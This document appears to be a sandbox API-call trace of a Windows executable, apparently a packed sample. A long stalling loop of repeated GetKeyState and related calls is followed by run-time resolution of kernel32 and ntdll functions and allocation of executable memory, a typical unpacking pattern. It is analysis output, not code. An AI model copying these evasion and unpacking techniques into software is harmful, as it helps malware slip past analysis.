[0114.646] GetKeyState (nVirtKey=1) returned 0 [0114.646] GetStretchBltMode (hdc=0x1) returned 0 [0114.646] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.646] GetKeyState (nVirtKey=1) returned 0 [0114.646] GetStretchBltMode (hdc=0x1) returned 0 [0114.646] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.646] GetKeyState (nVirtKey=1) returned 0 [0114.646] GetStretchBltMode (hdc=0x1) returned 0 [0114.646] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.646] GetKeyState (nVirtKey=1) returned 0 [0114.646] GetStretchBltMode (hdc=0x1) returned 0 [0114.646] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.646] GetKeyState (nVirtKey=1) returned 0 [0114.646] GetStretchBltMode (hdc=0x1) returned 0 [0114.646] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.646] GetKeyState (nVirtKey=1) returned 0 [0114.647] GetStretchBltMode (hdc=0x1) returned 0 [0114.647] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.647] GetKeyState (nVirtKey=1) returned 0 [0114.647] GetStretchBltMode (hdc=0x1) returned 0 [0114.647] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.647] GetKeyState (nVirtKey=1) returned 0 [0114.647] GetStretchBltMode (hdc=0x1) returned 0 [0114.647] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.647] GetKeyState (nVirtKey=1) returned 0 [0114.647] GetStretchBltMode (hdc=0x1) returned 0 [0114.647] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.647] GetKeyState (nVirtKey=1) returned 0 [0114.647] GetStretchBltMode (hdc=0x1) returned 0 [0114.647] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.647] GetKeyState (nVirtKey=1) returned 0 [0114.647] GetStretchBltMode (hdc=0x1) returned 0 [0114.647] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.647] GetKeyState (nVirtKey=1) returned 0 [0114.647] GetStretchBltMode (hdc=0x1) returned 0 [0114.647] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.647] GetKeyState (nVirtKey=1) returned 0 [0114.647] GetStretchBltMode (hdc=0x1) returned 0 [0114.647] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.647] GetKeyState (nVirtKey=1) returned 0 [0114.647] GetStretchBltMode (hdc=0x1) returned 0 [0114.648] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.648] GetKeyState (nVirtKey=1) returned 0 [0114.648] GetStretchBltMode (hdc=0x1) returned 0 [0114.648] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.648] GetKeyState (nVirtKey=1) returned 0 [0114.648] GetStretchBltMode (hdc=0x1) returned 0 [0114.648] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.648] GetKeyState (nVirtKey=1) returned 0 [0114.648] GetStretchBltMode (hdc=0x1) returned 0 [0114.648] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.648] GetKeyState (nVirtKey=1) returned 0 [0114.648] GetStretchBltMode (hdc=0x1) returned 0 [0114.648] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.648] GetKeyState (nVirtKey=1) returned 0 [0114.648] GetStretchBltMode (hdc=0x1) returned 0 [0114.648] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.648] GetKeyState (nVirtKey=1) returned 0 [0114.648] GetStretchBltMode (hdc=0x1) returned 0 [0114.648] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.648] GetKeyState (nVirtKey=1) returned 0 [0114.648] GetStretchBltMode (hdc=0x1) returned 0 [0114.648] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.649] GetKeyState (nVirtKey=1) returned 0 [0114.649] GetStretchBltMode (hdc=0x1) returned 0 [0114.649] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.649] GetKeyState (nVirtKey=1) returned 0 [0114.649] GetStretchBltMode (hdc=0x1) returned 0 [0114.649] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.649] GetKeyState (nVirtKey=1) returned 0 [0114.649] GetStretchBltMode (hdc=0x1) returned 0 [0114.649] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.649] GetKeyState (nVirtKey=1) returned 0 [0114.649] GetStretchBltMode (hdc=0x1) returned 0 [0114.649] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.649] GetKeyState (nVirtKey=1) returned 0 [0114.649] GetStretchBltMode (hdc=0x1) returned 0 [0114.649] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.649] GetKeyState (nVirtKey=1) returned 0 [0114.650] GetStretchBltMode (hdc=0x1) returned 0 [0114.650] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.650] GetKeyState (nVirtKey=1) returned 0 [0114.650] GetStretchBltMode (hdc=0x1) returned 0 [0114.650] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.650] GetKeyState (nVirtKey=1) returned 0 [0114.650] GetStretchBltMode (hdc=0x1) returned 0 [0114.650] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.650] GetKeyState (nVirtKey=1) returned 0 [0114.650] GetStretchBltMode (hdc=0x1) returned 0 [0114.650] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.650] GetKeyState (nVirtKey=1) returned 0 [0114.650] GetStretchBltMode (hdc=0x1) returned 0 [0114.650] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.650] GetKeyState (nVirtKey=1) returned 0 [0114.650] GetStretchBltMode (hdc=0x1) returned 0 [0114.650] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.650] GetKeyState (nVirtKey=1) returned 0 [0114.650] GetStretchBltMode (hdc=0x1) returned 0 [0114.650] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.650] GetKeyState (nVirtKey=1) returned 0 [0114.650] GetStretchBltMode (hdc=0x1) returned 0 [0114.651] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.651] GetKeyState (nVirtKey=1) returned 0 [0114.651] GetStretchBltMode (hdc=0x1) returned 0 [0114.651] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.651] GetKeyState (nVirtKey=1) returned 0 [0114.651] GetStretchBltMode (hdc=0x1) returned 0 [0114.651] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.651] GetKeyState (nVirtKey=1) returned 0 [0114.651] GetStretchBltMode (hdc=0x1) returned 0 [0114.651] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.651] GetKeyState (nVirtKey=1) returned 0 [0114.651] GetStretchBltMode (hdc=0x1) returned 0 [0114.651] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.651] GetKeyState (nVirtKey=1) returned 0 [0114.651] GetStretchBltMode (hdc=0x1) returned 0 [0114.651] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.651] GetKeyState (nVirtKey=1) returned 0 [0114.651] GetStretchBltMode (hdc=0x1) returned 0 [0114.651] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.651] GetKeyState (nVirtKey=1) returned 0 [0114.651] GetStretchBltMode (hdc=0x1) returned 0 [0114.651] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.651] GetKeyState (nVirtKey=1) returned 0 [0114.651] GetStretchBltMode (hdc=0x1) returned 0 [0114.651] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.651] GetKeyState (nVirtKey=1) returned 0 [0114.652] GetStretchBltMode (hdc=0x1) returned 0 [0114.652] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.652] GetKeyState (nVirtKey=1) returned 0 [0114.652] GetStretchBltMode (hdc=0x1) returned 0 [0114.652] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.652] GetKeyState (nVirtKey=1) returned 0 [0114.652] GetStretchBltMode (hdc=0x1) returned 0 [0114.652] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.652] GetKeyState (nVirtKey=1) returned 0 [0114.652] GetStretchBltMode (hdc=0x1) returned 0 [0114.652] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.652] GetKeyState (nVirtKey=1) returned 0 [0114.652] GetStretchBltMode (hdc=0x1) returned 0 [0114.652] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.652] GetKeyState (nVirtKey=1) returned 0 [0114.652] GetStretchBltMode (hdc=0x1) returned 0 [0114.652] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.652] GetKeyState (nVirtKey=1) returned 0 [0114.652] GetStretchBltMode (hdc=0x1) returned 0 [0114.652] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.652] GetKeyState (nVirtKey=1) returned 0 [0114.652] GetStretchBltMode (hdc=0x1) returned 0 [0114.652] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.652] GetKeyState (nVirtKey=1) returned 0 [0114.652] GetStretchBltMode (hdc=0x1) returned 0 [0114.653] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.653] GetKeyState (nVirtKey=1) returned 0 [0114.653] GetStretchBltMode (hdc=0x1) returned 0 [0114.653] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.653] GetKeyState (nVirtKey=1) returned 0 [0114.653] GetStretchBltMode (hdc=0x1) returned 0 [0114.653] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.653] GetKeyState (nVirtKey=1) returned 0 [0114.653] GetStretchBltMode (hdc=0x1) returned 0 [0114.653] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.653] GetKeyState (nVirtKey=1) returned 0 [0114.653] GetStretchBltMode (hdc=0x1) returned 0 [0114.653] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.653] GetKeyState (nVirtKey=1) returned 0 [0114.653] GetStretchBltMode (hdc=0x1) returned 0 [0114.653] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.653] GetKeyState (nVirtKey=1) returned 0 [0114.653] GetStretchBltMode (hdc=0x1) returned 0 [0114.653] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.653] GetKeyState (nVirtKey=1) returned 0 [0114.653] GetStretchBltMode (hdc=0x1) returned 0 [0114.653] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.653] GetKeyState (nVirtKey=1) returned 0 [0114.653] GetStretchBltMode (hdc=0x1) returned 0 [0114.653] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.653] GetKeyState (nVirtKey=1) returned 0 [0114.653] GetStretchBltMode (hdc=0x1) returned 0 [0114.654] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.654] GetKeyState (nVirtKey=1) returned 0 [0114.654] GetStretchBltMode (hdc=0x1) returned 0 [0114.654] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.654] GetKeyState (nVirtKey=1) returned 0 [0114.654] GetStretchBltMode (hdc=0x1) returned 0 [0114.654] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.654] GetKeyState (nVirtKey=1) returned 0 [0114.654] GetStretchBltMode (hdc=0x1) returned 0 [0114.654] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.654] GetKeyState (nVirtKey=1) returned 0 [0114.654] GetStretchBltMode (hdc=0x1) returned 0 [0114.654] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.654] GetKeyState (nVirtKey=1) returned 0 [0114.654] GetStretchBltMode (hdc=0x1) returned 0 [0114.654] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.654] GetKeyState (nVirtKey=1) returned 0 [0114.654] GetStretchBltMode (hdc=0x1) returned 0 [0114.654] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.654] GetKeyState (nVirtKey=1) returned 0 [0114.654] GetStretchBltMode (hdc=0x1) returned 0 [0114.654] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.654] GetKeyState (nVirtKey=1) returned 0 [0114.654] GetStretchBltMode (hdc=0x1) returned 0 [0114.654] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.655] GetKeyState (nVirtKey=1) returned 0 [0114.655] GetStretchBltMode (hdc=0x1) returned 0 [0114.655] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.655] GetKeyState (nVirtKey=1) returned 0 [0114.655] GetStretchBltMode (hdc=0x1) returned 0 [0114.655] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.655] GetKeyState (nVirtKey=1) returned 0 [0114.655] GetStretchBltMode (hdc=0x1) returned 0 [0114.655] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.655] GetKeyState (nVirtKey=1) returned 0 [0114.655] GetStretchBltMode (hdc=0x1) returned 0 [0114.655] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.655] GetKeyState (nVirtKey=1) returned 0 [0114.655] GetStretchBltMode (hdc=0x1) returned 0 [0114.655] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.655] GetKeyState (nVirtKey=1) returned 0 [0114.655] GetStretchBltMode (hdc=0x1) returned 0 [0114.655] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.655] GetKeyState (nVirtKey=1) returned 0 [0114.655] GetStretchBltMode (hdc=0x1) returned 0 [0114.655] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.655] GetKeyState (nVirtKey=1) returned 0 [0114.655] GetStretchBltMode (hdc=0x1) returned 0 [0114.655] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.655] GetKeyState (nVirtKey=1) returned 0 [0114.655] GetStretchBltMode (hdc=0x1) returned 0 [0114.656] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.656] GetKeyState (nVirtKey=1) returned 0 [0114.656] GetStretchBltMode (hdc=0x1) returned 0 [0114.656] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.656] GetKeyState (nVirtKey=1) returned 0 [0114.656] GetStretchBltMode (hdc=0x1) returned 0 [0114.656] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.656] GetKeyState (nVirtKey=1) returned 0 [0114.656] GetStretchBltMode (hdc=0x1) returned 0 [0114.656] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.656] GetKeyState (nVirtKey=1) returned 0 [0114.656] GetStretchBltMode (hdc=0x1) returned 0 [0114.656] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.656] GetKeyState (nVirtKey=1) returned 0 [0114.656] GetStretchBltMode (hdc=0x1) returned 0 [0114.656] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.656] GetKeyState (nVirtKey=1) returned 0 [0114.656] GetStretchBltMode (hdc=0x1) returned 0 [0114.656] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.656] GetKeyState (nVirtKey=1) returned 0 [0114.656] GetStretchBltMode (hdc=0x1) returned 0 [0114.656] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.656] GetKeyState (nVirtKey=1) returned 0 [0114.656] GetStretchBltMode (hdc=0x1) returned 0 [0114.656] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.657] GetKeyState (nVirtKey=1) returned 0 [0114.657] GetStretchBltMode (hdc=0x1) returned 0 [0114.657] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.657] GetKeyState (nVirtKey=1) returned 0 [0114.657] GetStretchBltMode (hdc=0x1) returned 0 [0114.657] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.657] GetKeyState (nVirtKey=1) returned 0 [0114.657] GetStretchBltMode (hdc=0x1) returned 0 [0114.657] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.657] GetKeyState (nVirtKey=1) returned 0 [0114.657] GetStretchBltMode (hdc=0x1) returned 0 [0114.657] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.657] GetKeyState (nVirtKey=1) returned 0 [0114.657] GetStretchBltMode (hdc=0x1) returned 0 [0114.657] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.657] GetKeyState (nVirtKey=1) returned 0 [0114.657] GetStretchBltMode (hdc=0x1) returned 0 [0114.657] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.657] GetKeyState (nVirtKey=1) returned 0 [0114.657] GetStretchBltMode (hdc=0x1) returned 0 [0114.657] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.657] GetKeyState (nVirtKey=1) returned 0 [0114.657] GetStretchBltMode (hdc=0x1) returned 0 [0114.657] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.657] GetKeyState (nVirtKey=1) returned 0 [0114.657] GetStretchBltMode (hdc=0x1) returned 0 [0114.658] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.658] GetKeyState (nVirtKey=1) returned 0 [0114.658] GetStretchBltMode (hdc=0x1) returned 0 [0114.658] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.658] GetKeyState (nVirtKey=1) returned 0 [0114.658] GetStretchBltMode (hdc=0x1) returned 0 [0114.658] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.658] GetKeyState (nVirtKey=1) returned 0 [0114.658] GetStretchBltMode (hdc=0x1) returned 0 [0114.658] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.658] GetKeyState (nVirtKey=1) returned 0 [0114.658] GetStretchBltMode (hdc=0x1) returned 0 [0114.658] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.658] GetKeyState (nVirtKey=1) returned 0 [0114.658] GetStretchBltMode (hdc=0x1) returned 0 [0114.658] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.658] GetKeyState (nVirtKey=1) returned 0 [0114.658] GetStretchBltMode (hdc=0x1) returned 0 [0114.658] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.658] GetKeyState (nVirtKey=1) returned 0 [0114.658] GetStretchBltMode (hdc=0x1) returned 0 [0114.658] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.658] GetKeyState (nVirtKey=1) returned 0 [0114.659] GetStretchBltMode (hdc=0x1) returned 0 [0114.659] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.659] GetKeyState (nVirtKey=1) returned 0 [0114.659] GetStretchBltMode (hdc=0x1) returned 0 [0114.659] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.659] GetKeyState (nVirtKey=1) returned 0 [0114.659] GetStretchBltMode (hdc=0x1) returned 0 [0114.659] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.659] GetKeyState (nVirtKey=1) returned 0 [0114.659] GetStretchBltMode (hdc=0x1) returned 0 [0114.659] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.659] GetKeyState (nVirtKey=1) returned 0 [0114.659] GetStretchBltMode (hdc=0x1) returned 0 [0114.659] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.659] GetKeyState (nVirtKey=1) returned 0 [0114.659] GetStretchBltMode (hdc=0x1) returned 0 [0114.659] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.660] GetKeyState (nVirtKey=1) returned 0 [0114.660] GetStretchBltMode (hdc=0x1) returned 0 [0114.660] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.660] GetKeyState (nVirtKey=1) returned 0 [0114.660] GetStretchBltMode (hdc=0x1) returned 0 [0114.660] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.660] GetKeyState (nVirtKey=1) returned 0 [0114.660] GetStretchBltMode (hdc=0x1) returned 0 [0114.660] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.660] GetKeyState (nVirtKey=1) returned 0 [0114.660] GetStretchBltMode (hdc=0x1) returned 0 [0114.660] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.660] GetKeyState (nVirtKey=1) returned 0 [0114.660] GetStretchBltMode (hdc=0x1) returned 0 [0114.660] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.660] GetKeyState (nVirtKey=1) returned 0 [0114.660] GetStretchBltMode (hdc=0x1) returned 0 [0114.660] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.660] GetKeyState (nVirtKey=1) returned 0 [0114.660] GetStretchBltMode (hdc=0x1) returned 0 [0114.660] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.661] GetKeyState (nVirtKey=1) returned 0 [0114.661] GetStretchBltMode (hdc=0x1) returned 0 [0114.661] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.661] GetKeyState (nVirtKey=1) returned 0 [0114.661] GetStretchBltMode (hdc=0x1) returned 0 [0114.661] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.661] GetKeyState (nVirtKey=1) returned 0 [0114.661] GetStretchBltMode (hdc=0x1) returned 0 [0114.661] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.661] GetKeyState (nVirtKey=1) returned 0 [0114.661] GetStretchBltMode (hdc=0x1) returned 0 [0114.661] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.661] GetKeyState (nVirtKey=1) returned 0 [0114.661] GetStretchBltMode (hdc=0x1) returned 0 [0114.661] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.661] GetKeyState (nVirtKey=1) returned 0 [0114.661] GetStretchBltMode (hdc=0x1) returned 0 [0114.661] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.661] GetKeyState (nVirtKey=1) returned 0 [0114.661] GetStretchBltMode (hdc=0x1) returned 0 [0114.661] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.661] GetKeyState (nVirtKey=1) returned 0 [0114.661] GetStretchBltMode (hdc=0x1) returned 0 [0114.661] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.661] GetKeyState (nVirtKey=1) returned 0 [0114.661] GetStretchBltMode (hdc=0x1) returned 0 [0114.662] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.662] GetKeyState (nVirtKey=1) returned 0 [0114.662] GetStretchBltMode (hdc=0x1) returned 0 [0114.663] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.663] GetKeyState (nVirtKey=1) returned 0 [0114.663] GetStretchBltMode (hdc=0x1) returned 0 [0114.663] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.663] GetKeyState (nVirtKey=1) returned 0 [0114.663] GetStretchBltMode (hdc=0x1) returned 0 [0114.663] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.663] GetKeyState (nVirtKey=1) returned 0 [0114.663] GetStretchBltMode (hdc=0x1) returned 0 [0114.663] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.663] GetKeyState (nVirtKey=1) returned 0 [0114.663] GetStretchBltMode (hdc=0x1) returned 0 [0114.663] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.663] GetKeyState (nVirtKey=1) returned 0 [0114.663] GetStretchBltMode (hdc=0x1) returned 0 [0114.663] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.663] GetKeyState (nVirtKey=1) returned 0 [0114.663] GetStretchBltMode (hdc=0x1) returned 0 [0114.663] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.663] GetKeyState (nVirtKey=1) returned 0 [0114.663] GetStretchBltMode (hdc=0x1) returned 0 [0114.663] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.663] GetKeyState (nVirtKey=1) returned 0 [0114.663] GetStretchBltMode (hdc=0x1) returned 0 [0114.664] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.664] GetKeyState (nVirtKey=1) returned 0 [0114.664] GetStretchBltMode (hdc=0x1) returned 0 [0114.664] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.664] GetKeyState (nVirtKey=1) returned 0 [0114.664] GetStretchBltMode (hdc=0x1) returned 0 [0114.664] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.664] GetKeyState (nVirtKey=1) returned 0 [0114.664] GetStretchBltMode (hdc=0x1) returned 0 [0114.664] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.664] GetKeyState (nVirtKey=1) returned 0 [0114.664] GetStretchBltMode (hdc=0x1) returned 0 [0114.664] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.664] GetKeyState (nVirtKey=1) returned 0 [0114.664] GetStretchBltMode (hdc=0x1) returned 0 [0114.664] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.664] GetKeyState (nVirtKey=1) returned 0 [0114.664] GetStretchBltMode (hdc=0x1) returned 0 [0114.664] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.664] GetKeyState (nVirtKey=1) returned 0 [0114.664] GetStretchBltMode (hdc=0x1) returned 0 [0114.664] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.664] GetKeyState (nVirtKey=1) returned 0 [0114.664] GetStretchBltMode (hdc=0x1) returned 0 [0114.664] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.664] GetKeyState (nVirtKey=1) returned 0 [0114.664] GetStretchBltMode (hdc=0x1) returned 0 [0114.665] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.665] GetKeyState (nVirtKey=1) returned 0 [0114.665] GetStretchBltMode (hdc=0x1) returned 0 [0114.665] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.665] GetKeyState (nVirtKey=1) returned 0 [0114.665] GetStretchBltMode (hdc=0x1) returned 0 [0114.665] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.665] GetKeyState (nVirtKey=1) returned 0 [0114.665] GetStretchBltMode (hdc=0x1) returned 0 [0114.665] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.665] GetKeyState (nVirtKey=1) returned 0 [0114.665] GetStretchBltMode (hdc=0x1) returned 0 [0114.665] GetListBoxInfo (hwnd=0x0) returned 0x0 [0116.146] GetProcAddress (hModule=0x74bc0000, lpProcName="LoadLibraryExA") returned 0x74ca6040 [0116.146] LoadLibraryExA (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x772d0000 [0116.147] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcAddress") returned 0x772e51b0 [0116.147] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualAlloc") returned 0x772e6970 [0116.148] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualFree") returned 0x772e69d0 [0116.148] GetProcAddress (hModule=0x772d0000, lpProcName="UnmapViewOfFile") returned 0x772e68f0 [0116.148] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualProtect") returned 0x772e6a30 [0116.148] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryExA") returned 0x772e5aa0 [0116.148] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleA") returned 0x772e50b0 [0116.148] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleW") returned 0x772e50d0 [0116.148] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileA") returned 0x7733ed00 [0116.149] GetProcAddress (hModule=0x772d0000, lpProcName="SetFilePointer") returned 0x7733f120 [0116.149] GetProcAddress (hModule=0x772d0000, lpProcName="WriteFile") returned 0x7733f180 [0116.149] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0116.149] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempPathA") returned 0x7733efe0 [0116.149] GetProcAddress (hModule=0x772d0000, lpProcName="lstrlenA") returned 0x772e6c50 [0116.150] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcatA") returned 0x773270c0 [0116.150] GetProcAddress (hModule=0x772d0000, lpProcName="FreeLibrary") returned 0x772e4c40 [0116.150] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0116.150] GetProcAddress (hModule=0x74bc0000, lpProcName="VirtualAlloc") returned 0x74cb54c0 [0116.150] VirtualAlloc (lpAddress=0x0, dwSize=0xe200, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0116.153] VirtualProtect (in: lpAddress=0x400000, dwSize=0x11000, flNewProtect=0x40, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 1 [0116.159] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x77970000 [0116.160] GetProcAddress (hModule=0x77970000, lpProcName="NtClose") returned 0x779e1de0 [0116.160] GetProcAddress (hModule=0x77970000, lpProcName="NtCreateFile") returned 0x779e2260 [0116.160] GetProcAddress (hModule=0x77970000, lpProcName="RtlInitUnicodeString") returned 0x779e42f0 [0116.160] GetProcAddress (hModule=0x77970000, lpProcName="NtMapViewOfSection") returned 0x779e1f90 [0116.160] GetProcAddress (hModule=0x77970000, lpProcName="NtFsControlFile") returned 0x779e20a0 [0116.160] GetProcAddress (hModule=0x77970000, lpProcName="RtlImageNtHeader") returned 0x779bb4e0 [0116.161] GetProcAddress (hModule=0x77970000, lpProcName="RtlUnwind") returned 0x779d2d30 [0116.161] GetProcAddress (hModule=0x77970000, lpProcName="_chkstk") returned 0x779e5780 [0116.161] GetProcAddress (hModule=0x77970000, lpProcName="memset") returned 0x779e8190 [0116.161] GetProcAddress (hModule=0x77970000, lpProcName="memcpy") returned 0x779e7b00 [0116.161] GetProcAddress (hModule=0x77970000, lpProcName="RtlNtStatusToDosError") returned 0x779c5730 [0116.162] GetProcAddress (hModule=0x77970000, lpProcName="wcschr") returned 0x779e9950 [0116.162] GetProcAddress (hModule=0x77970000, lpProcName="memcmp") returned 0x779e7aa0 [0116.162] GetProcAddress (hModule=0x77970000, lpProcName="NtUnmapViewOfSection") returned 0x779e1fb0 [0116.162] GetProcAddress (hModule=0x77970000, lpProcName="NtDeleteFile") returned 0x779e29b0 [0116.162] GetProcAddress (hModule=0x77970000, lpProcName="_snprintf") returned 0x779e63a0 [0116.162] GetProcAddress (hModule=0x77970000, lpProcName="_wcslwr") returned 0x779e6c20 [0116.163] GetProcAddress (hModule=0x77970000, lpProcName="_snwprintf") returned 0x779e6450 [0116.163] GetProcAddress (hModule=0x77970000, lpProcName="NtOpenSection") returned 0x779e2080 [0116.163] GetProcAddress (hModule=0x77970000, lpProcName="_allmul") returned 0x779e5740 [0116.163] GetProcAddress (hModule=0x77970000, lpProcName="_aulldiv") returned 0x779e5960 